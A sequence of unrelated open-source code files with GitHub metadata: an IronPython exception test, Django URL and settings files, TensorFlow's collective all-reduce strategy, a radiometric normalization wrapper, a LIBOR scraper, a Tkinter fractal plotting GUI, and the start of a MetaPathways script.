    err = WindowsError(42, 'bar', 'baz')
    AreEqual(err.filename, 'baz')
    AreEqual(err.winerror, 42)
    AreEqual(err.strerror, 'bar')
    AreEqual(err.args, (42, 'bar'))
    # winerror code is passed through unmodified
    for i in xrange(256):
        x = WindowsError(i, 'foo')
        AreEqual(x.winerror, i)
    # winerror code is mapped to Python error code
    AreEqual(WindowsError(10, 'foo').errno, 7)
def test_derived_keyword_args():
    # Keyword arguments must flow through to a derived exception's __init__.
    class ED(Exception):
        def __init__(self, args=''):
            pass
    AreEqual(type(ED(args='')), ED)
# iptest entry point: discovers and runs all test_* functions in this module.
run_test(__name__)
| {
"content_hash": "d44639559014ff73355c2c64694ea39e",
"timestamp": "",
"source": "github",
"line_count": 1038,
"max_line_length": 159,
"avg_line_length": 27.886319845857418,
"alnum_prop": 0.5230774545705797,
"repo_name": "paweljasinski/ironpython3",
"id": "8d2fe7d8439d4d2899904619bcea32fd4a452e07",
"size": "29672",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Tests/test_exceptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "11099"
},
{
"name": "C#",
"bytes": "12284108"
},
{
"name": "CSS",
"bytes": "96"
},
{
"name": "Groff",
"bytes": "21080"
},
{
"name": "HTML",
"bytes": "13117230"
},
{
"name": "Makefile",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "PowerShell",
"bytes": "62360"
},
{
"name": "Python",
"bytes": "27267678"
},
{
"name": "R",
"bytes": "4949"
},
{
"name": "Ruby",
"bytes": "19"
},
{
"name": "Shell",
"bytes": "5147"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
} |
from django.conf.urls import url
from . import views
# URL routes for the payments app; the route names are used by reverse()
# and {% url %} lookups elsewhere in the project.
urlpatterns = [
    url(r'^addpayment$', views.addPayment.as_view(), name='addpayment'),
    url(r'^paymentmethods$', views.paymentMethods.as_view(), name='paymentmethods'),
]
| {
"content_hash": "165044fb5ebf936ad148cd314c5b8811",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 85,
"avg_line_length": 34.57142857142857,
"alnum_prop": 0.6735537190082644,
"repo_name": "The-Akatsuki/thirdp",
"id": "7a4975fee8762dacbbad362858bd19c2c4d01b69",
"size": "242",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/payments/urls.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "196798"
},
{
"name": "HTML",
"bytes": "97337"
},
{
"name": "JavaScript",
"bytes": "11808"
},
{
"name": "Python",
"bytes": "48364"
},
{
"name": "Shell",
"bytes": "549"
}
],
"symlink_target": ""
} |
"""Class CollectiveAllReduceStrategy implementing DistributionStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.distribute.python import cross_tower_ops as cross_tower_ops_lib
from tensorflow.contrib.distribute.python import cross_tower_utils
from tensorflow.contrib.distribute.python import mirrored_strategy
from tensorflow.contrib.distribute.python import values
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.platform import tf_logging as logging
# TODO(yuefengz): support in-graph replication.
class CollectiveAllReduceStrategy(mirrored_strategy.MirroredStrategy):
"""Distribution strategy that uses collective ops for all-reduce.
It is similar to the MirroredStrategy but it uses collective ops for
reduction.
When `cluster_spec` is given by the `configure` method, it turns into the
mulit-worker version that works on multiple workers with between-graph
replication.
Note: `configure` will be called by higher-level APIs if running in
distributed environment.
"""
def __init__(self, num_gpus_per_worker=0):
"""Initializes the object.
Args:
num_gpus_per_worker: number of local GPUs or GPUs per worker, the default
is 0 meaning CPU only.
"""
self._num_gpus_per_worker = num_gpus_per_worker
self._initialize_local_worker(num_gpus_per_worker)
def _initialize_local_worker(self, num_gpus_per_worker):
"""Initializes the object for local training."""
self._is_chief = True
self._num_workers = 1
if num_gpus_per_worker:
local_devices = [
"/device:GPU:%d" % i for i in range(num_gpus_per_worker)
]
else:
local_devices = ["/device:CPU:0"]
self._collective_keys = cross_tower_utils.CollectiveKeys()
super(CollectiveAllReduceStrategy, self).__init__(
devices=local_devices,
cross_tower_ops=cross_tower_ops_lib.CollectiveAllReduce(
num_workers=1,
num_gpus_per_worker=num_gpus_per_worker,
collective_keys=self._collective_keys))
self._cluster_spec = None
self._task_type = None
self._task_id = None
logging.info("CollectiveAllReduceStrategy with local_devices = %r",
local_devices)
def _initialize_multi_worker(self, num_gpus_per_worker, cluster_spec,
task_type, task_id):
"""Initializes the object for multi-worker training."""
if task_type is None or task_id is None:
raise ValueError("When `cluster_spec` is given, you must also specify "
"`task_type` and `task_id`")
if task_type not in ["chief", "worker"]:
raise ValueError(
"Unrecognized task_type: %r, valid task types are: \"chief\", "
"\"worker\"." % task_type)
cluster_spec = multi_worker_util.normalize_cluster_spec(cluster_spec)
self._num_workers = len(cluster_spec.as_dict().get("worker", [])) + len(
cluster_spec.as_dict().get("chief", []))
if not self._num_workers:
raise ValueError("No `worker` or `chief` tasks can be found in "
"`cluster_spec`.")
self._is_chief = multi_worker_util.is_chief(cluster_spec, task_type,
task_id)
worker_device = "/job:%s/task:%d" % (task_type, task_id)
if num_gpus_per_worker:
local_devices = [
"%s/device:GPU:%d" % (worker_device, i)
for i in range(num_gpus_per_worker)
]
else:
local_devices = [worker_device]
self._collective_keys = cross_tower_utils.CollectiveKeys()
super(CollectiveAllReduceStrategy, self).__init__(
devices=local_devices,
cross_tower_ops=cross_tower_ops_lib.CollectiveAllReduce(
num_workers=self._num_workers,
num_gpus_per_worker=num_gpus_per_worker,
collective_keys=self._collective_keys))
# Add a default device so that ops without specified devices will not end up
# on other workers.
self._default_device = "/job:%s/task:%d" % (task_type, task_id)
self._cluster_spec = multi_worker_util.normalize_cluster_spec(cluster_spec)
self._task_type = task_type
self._task_id = task_id
logging.info(
"Multi-worker CollectiveAllReduceStrategy with "
"cluster_spec = %r, task_type = %r, task_id = %r, "
"num_workers = %r, local_devices = %r", cluster_spec.as_dict(),
task_type, task_id, self._num_workers, local_devices)
def _create_variable(self, next_creator, *args, **kwargs):
colocate_with = kwargs.pop("colocate_with", None)
devices = self._get_devices_from(colocate_with)
group_size = len(devices) * self._num_workers
group_key = self._collective_keys.get_group_key(self._devices)
def _real_mirrored_creator(devices, *args, **kwargs):
"""Creates one MirroredVariable on the current worker."""
index = {}
unique_var_name = ops.get_default_graph().unique_name(
kwargs["name"], mark_as_used=False).rstrip("/")
collective_instance_key = self._collective_keys.get_instance_key(
key_id=unique_var_name)
if "initial_value" not in kwargs:
raise ValueError("Initial value must be specified.")
initial_value = kwargs["initial_value"]
if callable(initial_value):
initial_value_fn = initial_value
else:
initial_value_fn = lambda: initial_value
for i, d in enumerate(devices):
with ops.device(d):
if i > 0:
# Give replicas meaningful distinct names:
var0name = index[devices[0]].name.split(":")[0]
# We append a / to variable names created on replicas with id > 0 to
# ensure that we ignore the name scope and instead use the given
# name as the absolute name of the variable.
kwargs["name"] = "%s/replica_%d/" % (var0name, i)
# The initial value fn makes sure variables all initialized to
# same values. The first device of the chief worker will send their
# variable values to other devices and other workers.
def _overridden_initial_value_fn(device=d, index=i): # pylint: disable=g-missing-docstring
with ops.device(device):
initial_value = initial_value_fn()
assert not callable(initial_value)
initial_value = ops.convert_to_tensor(initial_value)
if self._is_chief and index == 0:
bcast_send = collective_ops.broadcast_send(
initial_value, initial_value.shape, initial_value.dtype,
group_size, group_key, collective_instance_key)
with ops.control_dependencies([bcast_send]):
return array_ops.identity(initial_value)
else:
return collective_ops.broadcast_recv(
initial_value.shape, initial_value.dtype, group_size,
group_key, collective_instance_key)
kwargs["initial_value"] = _overridden_initial_value_fn
with context.context().device_policy(context.DEVICE_PLACEMENT_SILENT):
v = next_creator(*args, **kwargs)
if i == 0:
actual_var_name = v.name.split(":")[0]
assert unique_var_name == actual_var_name, "%r vs %r" % (
unique_var_name, actual_var_name)
assert not isinstance(v, values.DistributedVariable)
index[d] = v
return index
# pylint: disable=protected-access
return mirrored_strategy._create_mirrored_variable(
devices, _real_mirrored_creator, *args, **kwargs)
def distribute_dataset(self, dataset_fn):
"""Distributes the dataset to each local GPU."""
# TODO(yuefengz): shard the dataset.
return values.PerDeviceDataset(
self._call_dataset_fn(dataset_fn), self._devices, True)
def configure(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None):
"""Configures the object.
Args:
session_config: a `tf.ConfigProto`
cluster_spec: a dict, ClusterDef or ClusterSpec object specifying the
cluster configurations.
task_type: the current task type, such as "worker".
task_id: the current task id.
Raises:
ValueError: if `task_type` is not in the `cluster_spec`.
"""
if not self._cluster_spec and cluster_spec:
# If a `cluster_spec` is already passed in, do nothing here.
# TODO(yuefengz): check `cluster_spec` is the same if this object has
# already been initialized with a `cluster_spec`.
self._initialize_multi_worker(self._num_gpus_per_worker, cluster_spec,
task_type, task_id)
if not session_config:
return
# Enable the scoped allocator optimization for CollectiveOps. This
# optimization converts many small all-reduces into fewer larger
# all-reduces.
rewrite_options = session_config.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
# We turn on ScopedAllocator only for CollectiveReduce op, i.e. enable_op =
# ["CollectiveReduce"]. Since we can't assign to a repeated proto field, we
# clear and then append.
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append("CollectiveReduce")
if not self._cluster_spec:
return
assert self._task_type
assert self._task_id is not None
# Collective group leader is needed for collective ops to coordinate
# workers.
if "chief" in self._cluster_spec.jobs:
session_config.experimental.collective_group_leader = (
"/job:chief/replica:0/task:0")
else:
if "worker" not in self._cluster_spec.jobs:
raise ValueError(
"You must have `chief` or `worker` jobs in the `cluster_spec`.")
session_config.experimental.collective_group_leader = (
"/job:worker/replica:0/task:0")
# The device filters prevent communication between workers.
del session_config.device_filters[:]
session_config.device_filters.append(
"/job:%s/task:%d" % (self._task_type, self._task_id))
  @property
  def between_graph(self):
    """Whether this strategy uses between-graph replication (always True)."""
    return True
  @property
  def should_init(self):
    """Whether every task should run variable initialization (always True)."""
    return True
  @property
  def should_checkpoint(self):
    """Only the chief task writes checkpoints."""
    return self._is_chief
  @property
  def should_save_summary(self):
    """Only the chief task writes summaries."""
    return self._is_chief
  @property
  def num_replicas_in_sync(self):
    """Total replicas kept in sync: local devices per worker times workers."""
    return len(self._devices) * self._num_workers
| {
"content_hash": "aa0d049ce2a3b7381de0cef75cd1326b",
"timestamp": "",
"source": "github",
"line_count": 278,
"max_line_length": 101,
"avg_line_length": 39.410071942446045,
"alnum_prop": 0.6482292807594012,
"repo_name": "dongjoon-hyun/tensorflow",
"id": "d9339f8f75acda3695d33c55409e921a9627bac7",
"size": "11645",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/distribute/python/collective_all_reduce_strategy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3301"
},
{
"name": "Batchfile",
"bytes": "10132"
},
{
"name": "C",
"bytes": "446293"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "50950243"
},
{
"name": "CMake",
"bytes": "198845"
},
{
"name": "Dockerfile",
"bytes": "36908"
},
{
"name": "Go",
"bytes": "1285854"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "869263"
},
{
"name": "Jupyter Notebook",
"bytes": "2611125"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "62216"
},
{
"name": "Objective-C",
"bytes": "15634"
},
{
"name": "Objective-C++",
"bytes": "101475"
},
{
"name": "PHP",
"bytes": "5191"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "40335927"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "487251"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
'''
Copyright 2015 Planet Labs, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from osgeo import gdal
from radiometric_normalization import gimage
from radiometric_normalization import transformation
def generate(candidate_path, reference_path, pif_mask,
             method='linear_relationship', last_band_alpha=False):
    ''' Calculates per-band transformations between the PIF pixels of the
    candidate image and the PIF pixels of the reference image.

    :param str candidate_path: Path to the candidate image
    :param str reference_path: Path to the reference image
    :param array pif_mask: Boolean array in the coordinate system of the
        candidate/reference images (True marks a PIF pixel)
    :param str method: Transformation-fitting method to use
    :param bool last_band_alpha: Treat the last band as an alpha band
    :returns: A list of linear transformations, one per band
    :raises NotImplementedError: for any method other than
        'linear_relationship'
    '''
    # Guard clause: only one fitting method exists so far.
    if method != 'linear_relationship':
        raise NotImplementedError('Only "linear_relationship" '
                                  'method is implemented.')

    cand_ds, cand_alpha, cand_band_count = _open_image_and_get_info(
        candidate_path, last_band_alpha)
    ref_ds, ref_alpha, ref_band_count = _open_image_and_get_info(
        reference_path, last_band_alpha)
    _assert_consistent(cand_alpha, ref_alpha, cand_band_count, ref_band_count)

    # Fit one linear transformation per band (GDAL bands are 1-indexed).
    transformations = []
    for band_no in range(1, cand_band_count + 1):
        cand_band = gimage.read_single_band(cand_ds, band_no)
        ref_band = gimage.read_single_band(ref_ds, band_no)
        transformations.append(
            transformation.generate_linear_relationship(
                cand_band, ref_band, pif_mask))
    return transformations
def _open_image_and_get_info(path, last_band_alpha):
    '''Open *path* with GDAL and return (dataset, alpha_band, band_count).'''
    dataset = gdal.Open(path)
    alpha_band, band_count = gimage.read_alpha_and_band_count(
        dataset, last_band_alpha=last_band_alpha)
    return dataset, alpha_band, band_count
def _assert_consistent(c_alpha, r_alpha, c_band_count, r_band_count):
assert r_band_count == c_band_count
assert r_alpha.shape == c_alpha.shape
| {
"content_hash": "e0df141be6cf449b6408c64da10663fe",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 79,
"avg_line_length": 40.65079365079365,
"alnum_prop": 0.6884029675907849,
"repo_name": "planetlabs/radiometric_normalization",
"id": "d0bf9c089a0cbccb23636a4c0d210f2ad8670c31",
"size": "2561",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "radiometric_normalization/wrappers/transformation_wrapper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "106911"
},
{
"name": "Shell",
"bytes": "955"
}
],
"symlink_target": ""
} |
import matplotlib
# use the Tk backend
matplotlib.use('TkAgg')
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from mpl_toolkits.mplot3d import Axes3D
import os
import subprocess
import sys
import time
import Tkinter as tk
# Map fractals to odeint function names.
# Keys are the display names shown in the GUI option menu; values are the
# identifiers passed as the -f flag to the external draw program (see
# OdeIntGui.plot).
fractals = {
    "Barnsley's fern" : 'barnsley',
    #"Cantor set" : 'cantor',
    "Heighway's dragon" : 'heighway',
    "Koch curve" : 'koch_curve',
    "Maple leaf" : 'maple_leaf',
    "Sierpinski's triangle" : 'sierpinski',
}
class OdeIntGui(object):
def __init__(self, master, program_path):
self.program_path = program_path
#---- Main frame
self.frame = tk.Frame(master)
self.frame.pack(expand=True, fill=tk.BOTH)
#----
#---- Subframes
self.frame_menus = tk.Frame(self.frame)
self.frame_entries = tk.Frame(self.frame)
self.frame_canvas = tk.Frame(self.frame)
self.frame_buttons = tk.Frame(self.frame)
self.frame_menus.pack(expand=True, fill=tk.BOTH, padx=8)
self.frame_entries.pack(expand=True, fill=tk.BOTH, padx=8)
self.frame_canvas.pack(expand=True, fill=tk.BOTH, padx=8)
self.frame_buttons.pack(expand=True, fill=tk.BOTH, padx=8, pady=8)
#----
#---- String variables
self.fractal = tk.StringVar(self.frame_menus)
# SET DEFAULTS HERE
self.fractal.set("Barnsley's fern")
self.prev_fractal = self.fractal.get()
#----
#---- Integer variables
self.niter = tk.IntVar(self.frame_entries)
#----
#---- Menu subframe
self.label_fractals = tk.Label(self.frame_menus, text="Fractal:")
self.menu_fractals = tk.OptionMenu(self.frame_menus, self.fractal,
*fractals.keys(),
command=self.menu_onclick)
self.label_niter = tk.Label(self.frame_menus,
text="Number of iterations:")
self.entry_niter = tk.Entry(self.frame_menus, textvariable=self.niter,
width=5)
self.label_fractals.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.menu_fractals.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.label_niter.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.entry_niter.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
#----
#---- Canvas subframe
self.figure = Figure(figsize=(7.8, 4.5))
self.canvas = FigureCanvasTkAgg(self.figure, self.frame_canvas)
self.canvas.get_tk_widget().pack(expand=True, fill=tk.BOTH)
self.toolbar = NavigationToolbar2TkAgg(self.canvas, self.frame_canvas)
self.toolbar.update()
self.canvas._tkcanvas.pack(expand=True, fill=tk.BOTH)
#----
#---- Button subframe
self.button_plot = tk.Button(self.frame_buttons, text="Plot",
command=self.plot)
self.button_clear = tk.Button(self.frame_buttons, text="Clear",
command=self.clear_figure)
self.button_quit = tk.Button(self.frame_buttons, text="Quit",
command=self.frame.quit)
self.button_plot.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.button_clear.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
self.button_quit.pack(expand=True, fill=tk.BOTH, side=tk.LEFT)
#----
def menu_onclick(self, event):
print "%s with %s iterations" % (self.fractal.get(), self.niter.get())
self.clear_figure()
prev_fractal = self.fractal.get()
def plot(self):
cmd = ("%s -f %s -n %s" % (self.program_path,
fractals[self.fractal.get()],
self.niter.get()))
print cmd
print "Computing..."
t0 = time.clock()
# heard "shell=True" might not be safe?
integration = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
t1 = time.clock()
print "Finished in %.9f s" % (t1 - t0)
print "Processing data..."
integration_stdout = integration.communicate()[0]
print "Plotting..."
data = []
for line in integration_stdout.split("\n"):
if line != "":
data.append(map(float, line.strip().split(" ")))
arrays = zip(*data)
self.graph = self.figure.add_subplot(111)
self.graph.scatter(arrays[0], arrays[1], s=1)
self.canvas.draw()
def clear_figure(self):
self.figure.clear()
self.canvas.draw()
def center(win):
    """Center *win* on the screen by rewriting its geometry string."""
    win.update_idletasks()
    w = win.winfo_width()
    h = win.winfo_height()
    # Keep the original half-difference formula (not (screen - size) // 2,
    # which rounds differently for mixed parities).
    offset_x = (win.winfo_screenwidth() // 2) - (w // 2)
    offset_y = (win.winfo_screenheight() // 2) - (h // 2)
    win.geometry('{}x{}+{}+{}'.format(w, h, offset_x, offset_y))
def print_usage():
    """Print the command-line usage string.

    Uses the parenthesized print form, which emits identical output under
    Python 2 (single argument) and Python 3.
    """
    print("python fractalsgui.py [program_path]")
def main():
    """Resolve the draw-program path from argv, then build and run the GUI."""
    # Default to the relative build location when no argument is given.
    if len(sys.argv) == 1:
        print "Program path not given; defaulting to ../src/draw"
        program_path = "../src/draw"
    elif len(sys.argv) == 2:
        program_path = sys.argv[1]
        print "Using " + program_path
    else:
        print_usage()
        sys.exit(0)
    # Fail fast if the external integrator binary is missing.
    if not os.path.isfile(program_path):
        raise ValueError("File " + program_path + " does not exist")
    root = tk.Tk()
    root.geometry('640x480')
    root.title("fractals GUI")
    #center(root)
    odeintgui = OdeIntGui(root, program_path)
    root.mainloop()


if __name__ == '__main__':
    main()
| {
"content_hash": "c8bcc3ac20444f94ce783dd08a34d921",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 88,
"avg_line_length": 36.33125,
"alnum_prop": 0.5690693273696886,
"repo_name": "pauljxtan/fractals",
"id": "a267a29b34aa450f04e994a420ec0b927e402ec3",
"size": "5859",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/fractalsgui.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "14297"
},
{
"name": "Makefile",
"bytes": "342"
},
{
"name": "Python",
"bytes": "6768"
}
],
"symlink_target": ""
} |
from PyQt5.uic import loadUiType
from PyQt5.QtWidgets import QDataWidgetMapper
import os
ROOT_PATH = os.getcwd()
DynVarBase, DynVarForm = loadUiType(os.path.join(ROOT_PATH, 'CycleControl', 'dynamic_var_widget.ui'))
class DynamicVariableEditor(DynVarForm, DynVarBase):
    """Form widget (from dynamic_var_widget.ui) that edits one dynamic
    variable row of a model through a QDataWidgetMapper."""

    def __init__(self, parent = None):
        # NOTE(review): `parent` is accepted but not forwarded to
        # super().__init__(), so the widget is created unparented — confirm
        # whether that is intentional.
        super(DynamicVariableEditor, self).__init__()
        self.setupUi(self)
        self._model = None
        self._data_mapper = QDataWidgetMapper(self)

    @property
    def model(self):
        """The item model currently bound to the mapper (None until set)."""
        return self._model

    @model.setter
    def model(self, model):
        """Bind *model* and map each form field to a model column (0-6)."""
        self._model = model
        self._data_mapper.setModel(model)
        # Column order: name, default, start, end, log flag, send flag,
        # step size (mapped to the widget's 'text' property).
        self._data_mapper.addMapping(self.dyn_var_name, 0)
        self._data_mapper.addMapping(self.dyn_var_default, 1)
        self._data_mapper.addMapping(self.dyn_var_start, 2)
        self._data_mapper.addMapping(self.dyn_var_end, 3)
        self._data_mapper.addMapping(self.dyn_var_log, 4)
        self._data_mapper.addMapping(self.dyn_var_send, 5)
        self._data_mapper.addMapping(self.dyn_var_stepsize, 6, 'text')

        # Drop focus after checkbox clicks so edits commit immediately.
        self.dyn_var_log.clicked.connect(self.dyn_var_log.clearFocus)
        self.dyn_var_send.clicked.connect(self.dyn_var_send.clearFocus)
def selectionChanged(self, current_index, old_index):
self._data_mapper.setCurrentIndex(current_index.row()) | {
"content_hash": "607fb3a4cf3cdc383d75b1282dd6794b",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 101,
"avg_line_length": 36.270270270270274,
"alnum_prop": 0.6788375558867362,
"repo_name": "ultracoldYEG/cycle-control",
"id": "9c668ed74872cefcf7e270e42934aa764a3576dd",
"size": "1342",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CycleControl/widgets/variable_editor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "111790"
}
],
"symlink_target": ""
} |
from financial_data_utils.libor.globalrates.service import Service
from financial_data_utils.libor.globalrates.parser import ParserHeaders, ParserValues
from collections import namedtuple
import datetime
class Libor :
    # Record type: fixing date plus the seven standard USD LIBOR tenors.
    Libor = namedtuple("Libor", ['date', 'overnight', 'week', 'month', 'month2', 'month3', 'month6', 'month12' ])

    def getUSD ( self ) :
        """Fetch the global-rates USD page and return a Libor record.

        The page is parsed twice: once for the column headers and once for
        the values; values[0] is the fixing date (MM-DD-YYYY) and each rate
        sits one slot after its header's index.
        """
        text = Service().getResponse( 'usd' ).text

        header_parser = ParserHeaders()
        header_parser.feed( text )
        headers = header_parser.headers

        value_parser = ParserValues()
        value_parser.feed( text )
        values = value_parser.values

        fixing_date = datetime.datetime.strptime( values[ 0 ], '%m-%d-%Y' ).date()
        tenor_labels = ( 'overnight', '1 week', '1 month', '2 months',
                         '3 months', '6 months', '12 months' )
        rates = [ float( values[ headers.index( label ) + 1 ] )
                  for label in tenor_labels ]
        return Libor.Libor( fixing_date, *rates )
| {
"content_hash": "2620351cefcac39ea0b5af0b7e25dfd6",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 113,
"avg_line_length": 36.625,
"alnum_prop": 0.5537542662116041,
"repo_name": "creative-quant/financial-data-utils",
"id": "39b1dde44d18d567e98be4c950a603bf3641c06d",
"size": "1172",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "financial_data_utils/libor/libor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "46634"
},
{
"name": "Python",
"bytes": "20470"
}
],
"symlink_target": ""
} |
"""
Development settings and globals.
"""
from .base import *
""" DEBUG CONFIGURATION """
# Disable debugging by default.
DEBUG = True
""" END DEBUG CONFIGURATION """
""" ALLOWED HOSTS CONFIGURATION """
ALLOWED_HOSTS = ['127.0.0.1',]
""" END ALLOWED HOSTS CONFIGURATION """
""" EMAIL CONFIGURATION """
EMAIL_HOST = 'smtp.host'
EMAIL_HOST_USER = 'user'
EMAIL_HOST_PASSWORD = 'password'
EMAIL_FROM_ADDRESS = 'do-not-reply-ODM2-Admin@cuahsi.org'
RECAPTCHA_PUBLIC_KEY = 'googlerecaptchakey'
RECAPTCHA_PRIVATE_KEY = 'googlerecaptchaprivatekey'
EMAIL_USE_TLS = True
EMAIL_PORT = 123
""" EMAIL CONFIGURATION """
""" DATABASE CONFIGURATION """
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '../../ODM2SQliteBlank.db',
},
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': 'ODM2SQliteBlank.db',
# }
# }
""" END DATABASE CONFIGURATION """
""" END DATABASE CONFIGURATION """
""" SENSOR DASHBOARD CONFIGURATION """
SENSOR_DASHBOARD = {
"time_series_days": 30,
"featureactionids": [1699, 1784,1782,1701],
}
""" END SENSOR DASHBOARD CONFIGURATION"""
""" MAP CONFIGURATION """
MAP_CONFIG = {
"lat": 0,
"lon": 0,
"zoom": 2,
"cluster_feature_types": ['Profile','Specimen','Excavation','Field area'],
"time_series_months": 1,
"display_titles": True,
"MapBox": {
"access_token": 'mapbox accessToken'
},
"result_value_processing_levels_to_display": [1, 2, 3],
"feature_types": ['Site','Profile','Specimen','Excavation','Field area',
'Weather station','Observation well','Stream gage','Transect']
}
""" END MAP CONFIGURATION """
""" DATA DISCLAIMER CONFIGURATION """
DATA_DISCLAIMER = {
"text" : "Add a link discribing where your data come from",
"linktext" : "The name of my site",
"link" : "http://mysiteswegpage.page/"
}
""" END DATA DISCLAIMER CONFIGURATION """
| {
"content_hash": "5c64ed1c1a9d2ea42c617aeea824e8d2",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 80,
"avg_line_length": 25.78481012658228,
"alnum_prop": 0.605301914580265,
"repo_name": "ocefpaf/ODM2-Admin",
"id": "6710d10eac5c4eec71d1fe2c5321641600ac94c1",
"size": "2037",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "templatesAndSettings/settings/exportdb.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23546"
},
{
"name": "HTML",
"bytes": "196651"
},
{
"name": "JavaScript",
"bytes": "491201"
},
{
"name": "PLpgSQL",
"bytes": "270728"
},
{
"name": "Python",
"bytes": "636222"
},
{
"name": "Shell",
"bytes": "1361"
}
],
"symlink_target": ""
} |
'''
This script, given the location of a web log, prints the 10 most requested
objects and their cumulative bytes transferred.
It only includes GET requests with Successful (HTTP 2xx) responses.
To run:
python top10ObjectTransferred.py /path/to/web.log
(Python 2 script.)
'''
import sys
from collections import Counter

#Create new Counter with object as key and bytes as value
objectToBytesCounter = Counter()

#Open log file
for line in open(sys.argv[1],'r'):
    #Split line
    splitLine = line.split(" ")
    #Request type e.g GET, PUT etc
    requestType = splitLine[2][1:]
    #Object
    requestedObject = splitLine[3]
    #HTTP code e.g 200,400 etc
    requestedObjectHTTPCode = splitLine[5]
    #Size of object in bytes
    requestedObjectBytes = splitLine[6].rstrip('\n')
    #If request is GET and HTTP Code is 2xx, add bytes to counter
    if requestType == 'GET' and requestedObjectHTTPCode[0] == '2':
        #Add keyval pair to counter
        objectToBytesCounter.update({requestedObject:int(requestedObjectBytes)})

#Get top 10 requested objects with their cumulative bytes transferred and
#sort them ascendingly (by object name, since most_common yields pairs)
for requestedObject in sorted(objectToBytesCounter.most_common(10)):
    print requestedObject[0],requestedObject[1]
| {
"content_hash": "2545c35d16558ead9f488110deecca3a",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 130,
"avg_line_length": 37,
"alnum_prop": 0.7719594594594594,
"repo_name": "singhjaideep/Stuff",
"id": "34b9e9cd1d871b39f80b3331b0476d6cfeb7b744",
"size": "1184",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "top10ObjectTransferred.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "60662"
}
],
"symlink_target": ""
} |
from __future__ import division
__author__ = "Kishori M Konwar"
__copyright__ = "Copyright 2013, MetaPathways"
__credits__ = ["r"]
__version__ = "1.0"
__maintainer__ = "Kishori M Konwar"
__status__ = "Release"
try:
from os import makedirs, sys, remove, rename
from sys import path
import re, math, traceback
from copy import copy
from optparse import OptionParser, OptionGroup
from libs.python_modules.utils.metapathways_utils import parse_command_line_parameters, fprintf, printf, eprintf, exit_process, ShortenORFId
from libs.python_modules.utils.sysutil import getstatusoutput
except:
print """ Could not load some user defined module functions"""
print """ Make sure your typed 'source MetaPathwaysrc'"""
print """ """
sys.exit(3)
usage= sys.argv[0] +" -i/--input <input> -o/--output <output> -t/--type <HMM/LAST/BLAST> -l/--list <listfile> [ -a OPTIONAL ] """
parser = None
def createParser():
    """Build the module-level OptionParser with all command-line options."""
    global parser
